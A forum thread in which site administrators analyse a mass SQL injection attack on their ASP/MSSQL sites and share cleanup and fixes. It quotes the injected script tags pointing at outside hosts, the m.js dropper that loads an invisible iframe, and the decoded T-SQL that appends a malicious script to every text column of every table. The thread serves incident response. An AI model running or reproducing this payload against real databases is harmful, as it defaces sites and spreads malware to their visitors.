SQL Injection
Join Date: Mar 2007
Posts: 1
We recently had an MSSQL injection on our server and don't know why it happened. We got a funny email in our ticket center (which is at another data center) saying we have an exploit in our code, and then two hours later the server got hacked through our ASP code, and then we had multiple SQL injections of this random string in some tables.
"<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.dot<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>"
If the code won't allow special characters as input into database writes, how can a person do a SQL injection by parsing off a compiled DLL file that doesn't accept file attachments?
I don't know about this kind of thing, but if you go to
http://www.dota11.cn/m.js
this is the file that you get; maybe it sheds some light on what happened.

```javascript
// Visitors whose browser locale is Simplified Chinese only get a hit-counter script...
if (navigator.systemLanguage=='zh-cn')
{
document.writeln("<script language=\"javascript\" src=\"http:\/\/count40.51yes.com\/click.aspx?id=408936399&logo=1\"><\/script>");
}
else{
// ...everyone else gets a zero-height (invisible) iframe that loads dj.htm from dota11.cn
document.writeln("<iframe src=http:\/\/www.dota11.cn\/dj.htm width=100 height=0><\/iframe>");
}
// Suppress script errors so the visitor sees nothing unusual
window.onerror=function(){return true};
// The remaining line is a 51.la visitor-tracking snippet, reproduced as posted
document.write ('<script>var a3070tf="51la";var a3070pu="";var a3070pf="51la";var a3070su=window.location;var a3070sf=document.referrer;var a3070of="";var a3070op="";var a3070ops=1;var a3070ot=1;var a3070d=new Date();var a3070color="";if (navigator.appName=="Netscape"){a3070color=screen.pixelDepth;} else {a3070color=screen.colorDepth;}<\/script><script>a3070tf=top.document.referrer;<\/script><script>a3070pu =window.parent.location;<\/script><script>a3070pf=window.parent.document.referrer;<\/script><script>a3070ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3070ops=(a3070ops==null)?1: (parseInt(unescape((a3070ops)[2]))+1);var a3070oe =new Date();a3070oe.setTime(a3070oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3070ops+ ";path=/;expires="+a3070oe.toGMTString();a3070ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3070ot==null){a3070ot=1;}else{a3070ot=parseInt(unescape((a3070ot)[2])); a3070ot=(a3070ops==1)?(a3070ot+1):(a3070ot);}a3070oe.setTime(a3070oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3070ot+";path=/;expires="+a3070oe.toGMTString();<\/script><script>a3070of=a3070sf;if(a3070pf!=="51la"){a3070of=a3070pf;}if(a3070tf!=="51la"){a3070of=a3070tf;}a3070op=a3070pu;try{lainframe}catch(e){a3070op=a3070su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=15&id=1893070&tpages=\'+a3070ops+\'&ttimes=\'+a3070ot+\'&tzone=\'+(0-a3070d.getTimezoneOffset()/60)+\'&tcolor=\'+a3070color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3070of)+\'&vpage=\'+escape(a3070op)+\'" \/>\');<\/script>');
```

Last edited by compdoc; May 20th, 2008 at 11:34 am.
Join Date: May 2008
Posts: 2
I'd be interested if anyone has a solution to this problem as we're suffering much the same thing - our m.js files are coming from a slightly different URL, but the end result is the same.
- Clean the data; restore from the last known good backup.
- Immediately set the database properties to Read-only=True (right-click the database name in SQL Server Management Studio, select Properties, edit the Read-only property, save the settings).
- Examine the IIS logs, searching for the domain that is showing up in the malicious script statements (in my case, dota11). The lines in the IIS logs that contain the script statement should point you toward the ASP file that is vulnerable.
- Fix the ASP code. In my case, a request variable was being directly used by the code without being checked, and that is how the attack was inserting the malicious script. I added a call to InStr(UCASE(requestVariable),"SCRIPT") to filter out any values containing scripts.
- Re-enable the database to Read-only=True after being reasonably sure that the ASP code is no longer vulnerable.
Join Date: Aug 2005
Posts: 11
Thanks for the suggestions; unfortunately, at least so far, there's nothing cropping up in the IIS logs to give us a hint of which page is open - which suggests they're not using an insecure querystring to do the damage, but somehow managing to pass the data as form data.
Given all the sites that have been affected (at least so far) have no public write access to the database (only read), and the content management system uses a combination of passwords and session variables to prevent unwanted access, this is getting both more puzzling - and more worrying - by the minute.
ETA - The search has finished and it has brought to light another site that's been affected. This one does have some public write access to the database (bookings and whatnot), but that's run through a fairly strict injection trap to prevent unwanted SQL commands (as are any querystrings, come to that!), while the maintenance is hidden behind an NT logon, so in theory, this shouldn't be possible...
Last edited by Athersgeo; May 27th, 2008 at 10:50 am.
Join Date: May 2008
Posts: 2
Update: found this in the IIS logs:

```text
2008-05-23 00:15:23 W3SVC655445 190.000.0.0 POST /display.asp EntryId=8;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(...|324|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Incorrect_syntax_near_';'. 80 - 58.215.65.96 Mozilla/3.0+(compatible;+Indy+Library) - - 500 0 0
```

They're targeting a SELECT statement in the ASP file, not an UPDATE or SELECT, and the file does not contain a form.
If you decode the CAST values, here is the actual SQL that is being injected:

```sql
-- Walks every text/ntext/nvarchar/varchar column (xtype 99/35/231/167) of every
-- user table (xtype 'u') and appends the script tag to each value.
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://c.uc8010.com/0.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
-- the decoded payload starts to repeat here and was cut off in the post
DECLARE @T varchar(255),@C
```

I've changed the ASP code to check the command line parameter value to make sure that it is numeric before passing it to a SELECT statement in the code.

```vbscript
EntryId = Request("EntryId")
If Not IsNumeric(EntryId) Then
    ' bail and deploy SQL injection countermeasures
    Response.End
End If
```

So, maybe try searching your IIS logs for DECLARE or NVARCHAR or CAST and see what you come up with - ?
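An added example (not code from anyone in this thread) that does what the "examine the IIS logs" step earlier and the post above describe: it scans IIS W3C log lines for the DECLARE/CAST/EXEC pattern, names the page and parameter that carried it, and decodes the hex CAST literal, which SQL Server reads as UTF-16LE because of NVARCHAR. The log lines are constructed samples, and the hex payload encodes only the harmless string "DECLARE @T varchar(255)".

```python
import re
from urllib.parse import unquote

# Constructed sample IIS W3C log lines (not taken from the thread). The hex in
# the second request is the string "DECLARE @T varchar(255)" as UTF-16LE bytes,
# which is how SQL Server interprets CAST(0x... AS NVARCHAR(4000)).
SAMPLE_LOG = """\
#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2008-05-23 00:15:23 W3SVC1 10.0.0.5 GET /display.asp EntryId=8 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2008-05-23 00:15:24 W3SVC1 10.0.0.5 POST /display.asp EntryId=8;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004c004100520045002000400054002000760061007200630068006100720028003200350035002900%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 192.0.2.10 Mozilla/3.0+(compatible;+Indy+Library) 500 0 0
"""

# The keywords the thread suggests grepping for, matched as whole words.
SUSPECT = re.compile(r"\b(DECLARE|CAST|EXEC)\b", re.IGNORECASE)
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+NVARCHAR", re.IGNORECASE)


def decode_nvarchar_hex(hexstr):
    """Turn the 0x... literal of CAST(0x.. AS NVARCHAR) back into SQL text."""
    return bytes.fromhex(hexstr).decode("utf-16-le")


def scan_log(text):
    """Return (method, page, parameter, decoded_sql) for each suspect request."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):      # skip header/directive lines
            continue
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        method, page, query = fields[4], fields[5], unquote(fields[6])
        if not SUSPECT.search(query):
            continue
        param = query.split("=", 1)[0]            # parameter carrying the payload
        match = HEX_CAST.search(query)
        decoded = decode_nvarchar_hex(match.group(1)) if match else None
        hits.append((method, page, param, decoded))
    return hits


if __name__ == "__main__":
    for method, page, param, sql in scan_log(SAMPLE_LOG):
        print(f"{method} {page} via {param}: {sql}")
```

A numeric check on EntryId like the one in the post rejects this particular string; passing the value as a bound parameter instead of concatenating it into the SELECT removes the whole injection class rather than one payload shape.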
Join Date: Aug 2005
Posts: 11
We have found that in several logs besides the affected sites, BUT, not found it in the logs for all the affected sites - which had made us a little iffy on whether the two things were connected, or whether it was two sets of people attempting to do unpleasant things to our server. We've already taken some steps to block that SQL anyway, but with that decode, that makes things a lot clearer.
Thank you very, very much!